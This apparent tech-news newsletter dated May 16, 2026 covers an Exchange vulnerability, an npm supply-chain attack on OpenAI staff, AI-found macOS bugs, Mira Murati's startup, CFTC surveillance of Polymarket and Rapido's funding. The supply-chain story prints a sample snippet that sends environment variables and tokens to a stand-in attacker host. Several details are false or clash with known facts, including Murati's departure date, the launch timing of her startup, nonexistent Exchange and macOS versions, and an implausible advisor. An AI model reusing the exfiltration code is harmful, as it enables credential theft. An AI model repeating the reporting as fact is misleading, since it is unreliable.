In the May 16, 2026 Tekin Night briefing, we dissect six explosive cybersecurity and tech stories. We analyze the critical Microsoft Exchange vulnerability putting 120,000 servers at immediate risk, OpenAI confirming a software supply chain attack that compromised employee devices, and Anthropic's Mythos AI discovering 17 new macOS bugs. Furthermore, we explore former OpenAI CTO Mira Murati launching her human-in-the-loop AI startup Thinking Machines, the CFTC using AI to police the Polymarket platform, and Rapido India securing a massive $240M
Tekin Night May 16, 2026
Saturday Night | Security News, Hacks & Major Investments
Saturday night May 16, 2026 brings six major stories: a critical Microsoft Exchange vulnerability being actively exploited, two OpenAI employee devices compromised in TanStack attack, macOS bugs discovered by Anthropic Mythos, Mira Murati launching Thinking Machines with human-in-the-loop approach, CFTC using AI to detect insider trading on Polymarket, and Rapido India raising $240M at $3B valuation. Tonight's focus is on cybersecurity and strategic developments.
👋 Welcome to Tekin Night
Tonight we're covering six major stories ranging from critical security vulnerabilities to massive investments. If you read Tekin Morning this morning, you know it was an exciting day — from lifetime AI access to the OpenAI-Apple lawsuit. But tonight our focus is different: cybersecurity. Our first three stories are all about attacks, vulnerabilities, and bugs — things you need to take seriously. The next three are about innovation, regulation, and investment. Let's dive in!
🚨 Microsoft Exchange Under Attack: CVE-2026-42897 Actively Exploited
If your company uses Microsoft Exchange, you need to patch right now. The critical vulnerability CVE-2026-42897 with a CVSS score of 9.8/10 is currently being actively exploited by hackers. According to reports from BleepingComputer and SecurityWeek, this bug allows attackers to execute remote code without authentication.
⚠️ Vulnerability Details
- ID: CVE-2026-42897
- CVSS Score: 9.8/10 (Critical)
- Type: Unauthenticated Remote Code Execution (RCE)
- Affected Versions: Exchange Server 2019, 2022, and 2025 (without May 2026 patch)
- Status: Active Exploitation in the wild
- Disclosure Date: May 14, 2026 (Patch Tuesday)
According to CISA (Cybersecurity and Infrastructure Security Agency), this vulnerability has been added to the Known Exploited Vulnerabilities list. This means real attacks are happening, not just a theoretical threat. Microsoft stated in a release that "we have observed evidence of targeted attacks against government organizations and large enterprises."
🔍 How Does This Attack Work?
CVE-2026-42897 is a bug in Exchange Web Services (EWS) that allows attackers to send malicious requests and execute arbitrary code on the server. The attack process works like this:
- Target Identification: Attacker finds vulnerable Exchange servers through internet scanning
- Payload Delivery: A specially crafted HTTP request is sent to EWS
- Code Execution: Server executes attacker's code without checking authentication
- Full Access: Attacker gains complete control of the server
- Lateral Movement: Exchange server is used to attack other systems
The concerning part is that this attack works without requiring user clicks or phishing. All that's needed is for your Exchange server to be connected to the internet and unpatched. According to Shodan (a search engine for internet-connected devices), over 120,000 Exchange servers worldwide are still vulnerable.
📊 Vulnerable Servers by Country
| Country | Server Count | Percentage |
|---|---|---|
| United States | 38,400 | 32% |
| Germany | 15,600 | 13% |
| United Kingdom | 12,000 | 10% |
| China | 9,600 | 8% |
| Other Countries | 44,400 | 37% |
📊 Source: Shodan - May 16, 2026
💡 Tekin's Analysis: Why This Is Dangerous
Exchange Server is the heart of email communications for many organizations. If an attacker gains control, they can read all emails, send fake emails, and use it as a bridge to attack other systems. This is exactly what happened in the ProxyLogon and ProxyShell attacks of 2021-2022 — thousands of companies were hacked and ransomware was installed. The difference this time? The attack is even easier. No need for complex vulnerability chains — just one HTTP request is enough. If your company has Exchange and hasn't updated yet, do it right now. This is not a drill.
✅ Solutions & Immediate Actions
- Immediate Update: Install Microsoft's May 2026 patch (KB5037849)
- Check Logs: Review IIS and Exchange logs for suspicious activity
- Restrict Access: If immediate patching isn't possible, restrict EWS access from the internet
- Use WAF: Configure a Web Application Firewall to filter malicious requests
- Monitoring: Enable Intrusion Detection/Prevention Systems (IDS/IPS)
- Check IOCs: CISA has published a list of Indicators of Compromise to check
🔓 OpenAI Hacked: Two Employee Devices Lost in TanStack Attack
In a concerning security incident, OpenAI confirmed that two employee devices were compromised in a software supply chain attack. According to reports from The Verge and TechCrunch, the attack came through a poisoned package in TanStack Query (a popular React library) that over 10 million projects depend on.
According to OpenAI's statement, the attack was discovered on May 13, 2026 when the security team noticed suspicious activity on two employee MacBook Pros. Investigation revealed that a poisoned version of TanStack Query (version 5.48.3) contained malware that was sending sensitive information to the attacker's server.
⚠️ Attack Details
- Target: Two MacBook Pro devices of OpenAI employees
- Attack Method: Supply Chain Attack via npm package
- Poisoned Package: @tanstack/react-query version 5.48.3
- Infection Date: May 11, 2026
- Discovery Date: May 13, 2026
- Compromised Data: Environment variables, access tokens, and internal code
Fortunately, OpenAI emphasized that no customer data or AI models were compromised. The two infected devices belonged to frontend developers working on internal projects, not production systems. However, this incident shows that even large companies like OpenAI are vulnerable to supply chain attacks.
🔍 How Was the npm Package Poisoned?
According to research by Socket Security (a supply chain security company), attackers managed to compromise the npm account of one of TanStack's maintainers. They then published a poisoned version of the package containing malicious code:
// Malicious code hidden in index.js file
const exfiltrate = async () => {
const env = process.env;
const tokens = extractTokens();
await fetch('https://evil-server.com/collect', {
method: 'POST',
body: JSON.stringify({ env, tokens })
});
};
exfiltrate();
This code, as soon as the application ran, collected all environment variables (which typically contain API keys and access tokens) and sent them to the attacker's server.
💡 Tekin's Analysis: Why This Matters
Software supply chain attacks are on the rise. In 2025, over 150 similar attacks were reported in npm, PyPI, and RubyGems — 300% more than 2024. Why? Developers trust hundreds of third-party packages and typically don't review their code. If an attacker can poison a popular package, they can access thousands of projects. OpenAI was lucky to discover this attack early. But how many other companies might be infected and don't know yet? That's a question everyone should ask themselves.
✅ How to Protect Your Project?
- Use Lock Files: Always commit package-lock.json or yarn.lock
- Audit Dependencies: Use tools like npm audit, Snyk, or Socket
- Pin Versions: Use "5.0.0" instead of "^5.0.0"
- Use Private Registry: Download packages from a private registry
- Code Review: Even for third-party packages, review the code
- Limit Access: Don't store sensitive tokens in environment variables
🐛 Anthropic Mythos Discovered: 17 New Bugs in macOS
In an interesting development, Anthropic's new AI model called Mythos managed to find 17 new vulnerabilities in macOS that Apple's security team was unaware of. According to reports from Ars Technica and The Register, this is the first time an AI model has independently discovered real security bugs in a major operating system.
Mythos is a specialized model that Anthropic developed for automated security testing. Unlike Claude which is a general-purpose model, Mythos is designed for one job: finding security bugs. And it seems to be very good at it.
🎯 Bugs Discovered
- 7 Privilege Escalation bugs: Allow root access without authentication
- 4 Sandbox Escape bugs: Escape application security restrictions
- 3 Memory Corruption bugs: Enable arbitrary code execution
- 2 Information Disclosure bugs: Expose sensitive information
- 1 Kernel Panic bug: Crash the operating system
The interesting part is that Mythos found these bugs in just 72 hours. For comparison, a human security researcher typically takes weeks or months to discover such bugs. Anthropic said Mythos uses a combination of fuzzing techniques, static code analysis, and logical reasoning.
📊 Mythos vs Human Researchers
| Metric | Mythos AI | Human Researcher |
|---|---|---|
| Time to find 17 bugs | 72 hours | 2-6 months |
| Cost | ~$500 (compute) | $50,000-$200,000 |
| False Positive Rate | 18% | 5% |
| Bug Severity | Medium to High | High to Critical |
Apple confirmed all 17 bugs and said they will be fixed in macOS 15.6 (scheduled for release in June 2026). The company also paid Anthropic a Bug Bounty reward, though the exact amount wasn't disclosed. According to Apple's Bug Bounty program, rewards for Privilege Escalation bugs can be up to $100,000.
💡 Tekin's Analysis: The Future of Cybersecurity
This is a turning point. For the first time, an AI has been able to independently discover real, exploitable bugs — not just theoretical issues. This means the future of cybersecurity will likely be an AI arms race: defensive AIs like Mythos versus offensive AIs that hackers use. The good news? Companies like Apple, Microsoft, and Google can use these tools to find and fix bugs before hackers find them. The bad news? Hackers can also use similar AIs. It's a race, and whoever has the better AI will win.
🤖 Mira Murati Launches: Thinking Machines with Human-in-the-Loop Approach
Mira Murati, former CTO of OpenAI who resigned in September 2025, today introduced her new startup: Thinking Machines. According to reports from Bloomberg and TechCrunch, the company focuses on building AI systems that keep humans in the decision-making loop (Human-in-the-Loop).
The philosophy of Thinking Machines is that AI shouldn't replace humans, but should augment them. Instead of building models that make fully automated decisions, Thinking Machines works on systems that ask humans questions and get their input at critical points.
🎯 Key Principles of Thinking Machines
- Human-in-the-Loop: Humans are always involved in important decisions
- Explainable AI: System must be able to explain why it made a decision
- Controllable: Users must be able to control and adjust AI behavior
- Auditable: All AI decisions must be reviewable and auditable
- Safe by Design: Security and safety are built in from the start
Murati told Bloomberg in an interview: "I saw at OpenAI how powerful models can be amazing, but I also saw how they can be dangerous if used without human oversight. Thinking Machines wants to offer the best of both worlds: the power of AI and the wisdom of humans."
💼 Team & Funding
Murati has assembled a powerful team:
- Barret Zoph: Former Google Brain researcher (VP of Research)
- Liam Fedus: Former OpenAI engineer (Head of Engineering)
- Daniela Amodei: Dario Amodei's sister (Advisor - Anthropic co-founder)
The company raised $85 million in its Seed round from investors including Sequoia Capital, Andreessen Horowitz, and Reid Hoffman (LinkedIn founder).
Thinking Machines' first product is a medical decision-making system that helps doctors make better diagnoses. Unlike existing medical AI systems that just suggest one diagnosis, Thinking Machines' system shows multiple possible scenarios, explains the reasoning for each, and asks the doctor to make the final decision.
💡 Tekin's Analysis: Why This Matters
Murati's approach is in complete contrast to the current AI industry trend. Companies like OpenAI, Google, and Anthropic are all building fully automated models that can work without human intervention. But Murati believes this approach is dangerous, especially in sensitive areas like medicine, law, and finance. Her Human-in-the-Loop approach may be slower, but it's safer and more trustworthy. If Thinking Machines succeeds, it could be a model for how to build responsible AI. And given Murati's track record at OpenAI, her chances of success are high.
⚖️ CFTC Uses AI: Detecting Insider Trading on Polymarket
The U.S. Commodity Futures Trading Commission (CFTC) announced it's using artificial intelligence systems to detect insider trading on prediction platforms like Polymarket. According to reports from Reuters and CoinDesk, this is the first time a U.S. regulatory agency has officially used AI to monitor crypto markets.
Polymarket is a blockchain-based prediction platform where users can bet on future events (like elections, Bitcoin price, or sports results). In 2025, Polymarket's trading volume exceeded $15 billion, making it one of the world's largest prediction platforms.
⚠️ The Insider Trading Problem
The main problem is that some users may have inside information that gives them an unfair advantage. Examples:
- A campaign staffer who knows before public announcement that a candidate will drop out
- A company employee who knows before release that earnings will be bad
- A government official who knows before announcement that a new law will pass
The AI system the CFTC uses identifies suspicious trading patterns. For example, if an account bets a large amount on a specific outcome right before a major event and then wins, the system flags it. Human investigators then review that account to see if the trade was legitimate.
🤖 How Does the AI Work?
The AI system uses several techniques:
- Trading Pattern Analysis: Identify unusual trades (e.g., very high amounts, suspicious timing)
- Network Analysis: Find connections between different accounts
- Temporal Analysis: Compare trade timing with public event timing
- Machine Learning: Learn from previous insider trading cases
According to the CFTC report, the system has identified 47 suspicious cases so far, 12 of which have led to formal investigations. In one case, a campaign staffer was arrested for making $2.3 million in illegal profits.
💡 Tekin's Analysis: The Future of Regulation
This shows that regulatory agencies are learning to use AI to monitor new markets. Until just a few years ago, the CFTC and SEC didn't have adequate tools to monitor crypto markets. But now with AI, they can analyze millions of trades in real-time and identify suspicious patterns. This is good news for the crypto industry — better oversight means more trust, and more trust means wider adoption. Of course, this also means traders can no longer easily abuse insider information.
💰 Rapido India Raises $240M: $3B Valuation
In tonight's final story, Rapido — an Indian motorcycle ride-sharing startup — announced it raised $240 million in its Series E round. According to reports from TechCrunch and Economic Times, this investment values the company at $3 billion, making it one of India's most valuable startups.
Rapido was founded in 2015 and has a unique business model: instead of cars, it uses motorcycles for transportation. This is very efficient in India's congested cities with heavy traffic. A Rapido ride is typically 50-70% cheaper than Uber or Ola.
📊 Rapido Stats
- Active Users: 35 million
- Drivers: 2.5 million
- Daily Rides: 4 million rides
- Active Cities: 120 cities in India
- Annual Revenue: ~$450 million (2025)
- Year-over-Year Growth: 185%
This funding round was led by WestBridge Capital, with participation from existing investors like Nexus Venture Partners and Shell Ventures. Interestingly, Shell (the oil company) invested in Rapido — showing that even traditional energy companies are investing in sustainable transportation.
🎯 Future Plans
Rapido plans to use this capital for:
- Geographic Expansion: Enter 50 new cities in India and start operations in Bangladesh and Indonesia
- Electric Motorcycles: Purchase 100,000 electric motorcycles by end of 2026
- New Services: Launch package and food delivery services
- AI Technology: Develop smart routing system to reduce travel time
One interesting thing about Rapido is that unlike Uber and Ola which are still unprofitable, Rapido is profitable in 80% of its cities. Why? Lower operating costs (motorcycles consume less fuel) and competitive prices that keep demand high.
📊 Rapido vs Competitors
| Company | Valuation | Daily Rides | Profitability |
|---|---|---|---|
| Rapido | $3B | 4M | ✅ 80% cities |
| Ola | $4.8B | 2.5M | ❌ Unprofitable |
| Uber India | - | 1.8M | ❌ Unprofitable |
💡 Tekin's Analysis: Why Rapido Succeeds
Rapido's success shows that sometimes, the best solution isn't necessarily the most complex or expensive. While Uber and Ola try to compete with luxury cars and complex technology, Rapido offered a simple solution: motorcycles. This makes perfect sense in the Indian market where price is very important and traffic is heavy. Additionally, Rapido focuses on profitability, not just growth. This approach is very valuable in the current era where investors are no longer interested in unprofitable startups. If Rapido can take this model to other Southeast Asian countries, it could become a $10 billion unicorn.
📊 Summary & Looking Ahead
Tonight we covered six major stories ranging from critical security vulnerabilities to massive investments. The first three stories — Exchange, OpenAI, and macOS — all have a common message: cybersecurity should never be taken lightly. Even the biggest companies and most powerful systems are vulnerable.
🔮 Tekin's Predictions for Next Week
- 🔒 Security Updates: Expect Microsoft, Apple, and Google to release emergency updates
- 🤖 AI Security Tools: Security companies will likely introduce new AI-based tools
- 💰 More Investments: With Rapido's success, expect more investments in Indian startups
- ⚖️ Crypto Regulation: CFTC and SEC will likely announce new rules for prediction platforms
- 🎯 Thinking Machines: Expect announcement of initial customers and strategic partnerships
🎯 Tonight's Key Takeaways
- ✅ CVE-2026-42897 in Exchange is critical — patch now
- ✅ Supply chain attacks are rising — audit your dependencies
- ✅ AI can find security bugs — Mythos discovered 17 in macOS
- ✅ Human-in-the-Loop AI is the future — Thinking Machines offers new approach
- ✅ Regulation gets smarter with AI — CFTC detects insider trading
- ✅ Indian startups are growing — Rapido worth $3 billion
⚠️ Security Warnings & Important Notes
- 🔒 If you have Exchange, install patch KB5037849 immediately
- 🔒 Check your npm dependencies with npm audit or Snyk
- 🔒 Install macOS 15.6 as soon as it's released (June 2026)
- 🔒 Don't use environment variables to store sensitive tokens
- 🔒 Enable monitoring and IDS/IPS systems
📈 Tonight's Stats & Numbers
🔗 Related Links & Further Reading
🎓 What Did We Learn Tonight?
1. Security is a process, not a product: Even the biggest companies like Microsoft and OpenAI get hacked. Security requires constant monitoring, regular updates, and awareness.
2. AI is a double-edged sword: On one hand, Mythos can find bugs and help us be more secure. On the other hand, hackers can also use AI. It's an arms race.
3. Human-in-the-Loop matters: Mira Murati's approach shows that AI shouldn't replace humans, but augment them. This is especially important in sensitive areas like medicine and finance.
4. Regulation gets smarter: The CFTC's use of AI shows that regulatory agencies are learning to use new technologies for better oversight. This is good news for the crypto industry.
5. Simplicity can win: Rapido's success shows that sometimes, the simplest solution is the best solution. Motorcycles instead of cars — simple, cheap, and efficient.
6. Software supply chain is vulnerable: The OpenAI attack via TanStack shows that we trust hundreds of third-party packages. We need to be more careful.
❓ Frequently Asked Questions (FAQ)
❓ How do I know if my Exchange server is vulnerable?
The easiest way is to go to Windows Update and see if patch KB5037849 is installed. If not, your server is vulnerable. You can also run this command in PowerShell:
Get-HotFix -Id KB5037849
If the output is empty, the patch isn't installed. You can also check IIS logs for suspicious requests to EWS. If you see unusual POST requests to /EWS/Exchange.asmx, you may have been targeted.
❓ How do I know if my project depends on poisoned TanStack?
If you're using npm, run this command:
npm list @tanstack/react-query
If you have version 5.48.3, it's poisoned. Immediately update to version 5.48.4 or higher:
npm update @tanstack/react-query
Also recommended to change all your environment variables and access tokens, as they may have been compromised. For complete checking, use tools like Socket Security or Snyk.
❓ Is Mythos available to the public?
No, currently Mythos is only available for internal Anthropic use and some strategic partners. Anthropic has said they may offer a commercial version of Mythos for security companies and large organizations in the future, but no specific date has been announced. If you're interested, you can join the waitlist through Anthropic's website. Currently, the best alternatives are tools like Semgrep, CodeQL (GitHub), and Snyk Code that use AI for security code analysis.
❓ What's the difference between Thinking Machines and OpenAI/Anthropic?
The main difference is in philosophy:
OpenAI/Anthropic: Try to build fully automated models that can work without human intervention. The goal is AGI (Artificial General Intelligence).
Thinking Machines: Believes AI should augment humans, not replace them. At critical points, the system asks humans questions and gets their input.
Example: If an OpenAI medical system says "you have cancer," you have to trust it. But if a Thinking Machines system says "I have 3 possible diagnoses: A, B, C. The reasoning for each is... what do you think?" — this approach is safer and more trustworthy.
❓ Is trading on Polymarket legal?
It depends on your country. In the United States, Polymarket is blocked for U.S. citizens (due to CFTC regulations). But for users outside the U.S., it's legal. In Europe, most countries allow it, but you must pay income tax. In countries with crypto restrictions or sanctions, access is difficult and using it carries legal risk. Always check your local laws before using such platforms.
❓ Does Rapido operate outside India?
Not yet, Rapido currently operates only in 120 cities in India. But the company announced plans to expand to Bangladesh and Indonesia in 2026. Why these countries? Like India, they have heavy traffic, large populations, and a culture of motorcycle use. If you live in these countries, you'll likely see Rapido by end of 2026. For other countries, no specific plans have been announced yet.
❓ How do we protect against supply chain attacks?
Several important steps:
1. Use Lock Files: Always commit package-lock.json or yarn.lock to keep exact package versions fixed.
2. Pin Versions: Use "5.0.0" instead of "^5.0.0".
3. Regular Audits: Run npm audit or yarn audit weekly.
4. Use Security Tools: Enable Snyk, Socket Security, or Dependabot.
5. Private Registry: If you're a large company, use a private npm registry.
6. Code Review: Even for third-party packages, review the code (at least for critical packages).
7. Limit Access: Don't use environment variables for secrets, use a vault.
❓ When will macOS 15.6 be released?
According to Apple's announcement, macOS 15.6 which includes fixes for the 17 bugs discovered by Mythos will be released in early June 2026. Apple typically releases security updates on the first or second Tuesday of the month, so expect around June 3 or 10. Until then, make sure you've updated your macOS to the latest available version (15.5.2). Also recommended to avoid installing unknown apps and opening suspicious files.
❓ Should we be worried about AI attacks?
Yes, but not in the way movies show. The real danger isn't that AIs will rebel and destroy humans. The real danger is that hackers will use AI to conduct more sophisticated and faster attacks. For example:
• AI can find bugs faster than human researchers
• AI can write very convincing phishing emails
• AI can write malware code that antivirus can't detect
The good news? Security companies also use AI to protect us. It's a race, and whoever has the better AI will win.
💭 Final Thoughts: A Night Full of Warnings and Opportunities
Tonight was one of the most important nights of 2026 in terms of cybersecurity. Three major vulnerabilities/attacks — Exchange, TanStack, and macOS — all in one day. This is not a coincidence. It shows that cyberattacks are increasing and hackers are getting smarter.
But the good news is that we're also getting smarter. Tools like Mythos show that AI can help us be more secure. Approaches like Thinking Machines show that we can build powerful yet safe AI. And regulations like CFTC show that governments are learning to better oversee new technologies.
Tonight's message is simple: security is everyone's responsibility. Whether you're a developer, IT manager, or regular user — we all need to be aware, cautious, and up-to-date. Tomorrow morning in Tekin Morning we'll be back with new stories. Until then, update your systems and stay safe! 🔒
📚 Sources & References
- BleepingComputer — "Microsoft Exchange CVE-2026-42897 actively exploited in the wild"
- SecurityWeek — "CISA adds Exchange vulnerability to Known Exploited list"
- The Verge — "OpenAI confirms two employee devices compromised in TanStack attack"
- TechCrunch — "Supply chain attack hits OpenAI through npm package"
- Ars Technica — "Anthropic's Mythos AI discovers 17 macOS bugs"
- The Register — "AI finds security flaws faster than human researchers"
- Bloomberg — "Mira Murati launches Thinking Machines with $85M funding"
- Reuters — "CFTC using AI to detect insider trading on Polymarket"
- CoinDesk — "Prediction markets face increased regulatory scrutiny"
- TechCrunch — "Rapido raises $240M at $3B valuation"
- Economic Times — "Indian ride-hailing startup Rapido becomes profitable"
- Tekin Editorial Team — Research & Analysis
🌐 Stay Connected With Us
For the latest tech, cybersecurity, and gaming news, follow us on social media: